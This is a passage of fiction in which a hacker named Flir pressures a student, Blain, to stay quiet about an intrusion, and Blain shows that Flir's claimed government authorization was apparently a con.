“You see, your prints are all over that machine. Inside, outside, everywhere. Your prints are on the tape and the desk. Everywhere. Just your prints, Blain. My prints aren’t on that gear. Am I being clear? Now the only problem is that you wiped all the data on each and every machine, so there’s little evidence of any of this, except on your controller laptop.”

My controller laptop?!?!” Blain screeched, a sick knot growing in his stomach.

“Yes, Blain, your controller laptop. Now, I could call campus IT security and give them a tip on their intruder, and point them to your room and your laptop…” Flir took out his cell phone and opened it. He gave Blain a serious look.

“Wait,” Blain knew he was out of his league. “OK, what do you want?”

“I want you to forget this ever happened.” Flir felt a pang of guilt as he looked into this kid’s face. For an instant he saw himself, years ago. Bright eyed and eager, this kid was impressionable, and scared. Flir held the kid’s very future in the palm of his hand, but Flir wasn’t malicious, just brilliant. “Look, Blain, I’m not a jerk, and I’m not a criminal.” Blain sat in silence, watching Flir. Flir continued. “That exercise you witnessed was authorized.”

“Authorized, how could it possibly be…” Blain was beyond confused.

Flir cast an uncomfortable glance around the restaurant, then leaned in towards Blain. In a hushed tone, Flir said “I was authorized by the government.”

“Mitch, you have got to be kidding me. After all the crap you’ve been through? How could you possibly trust the government?” Judging from the look on Flir’s face, the kid had a point. Blain continued, “How did the government approach you? Were you shown credentials? Did you call in and find out if those credentials were legitimate? Did you get a release form? Besides that, there’s no legitimate reason in the world why the government would authorize any citizen to do what you did. They could do it themselves. They probably were government, just not ours.”

It was Flir’s turn to be stunned, and the look on his face betrayed his feelings.

“What did you do with the data?” Blain asked. “You didn’t send it to anyone, did you?”

Flir’s face betrayed the answer again.

“Oh, man, Mitch, ”Blain said, completely horrified. “What have you done? You’re the smartest guy I know, and I have a ton of respect for you, but….”

“But what?” Flir asked. The tables were turned, and Flir knew full well that he had been duped. Right at that moment it had all become perfectly clear. He knew he would have to get even with Knuth. It was a moral imperative.

“Mitch, you have got to be the most gullible genius on the planet.”

Category: Book Reviews

Comments are closed.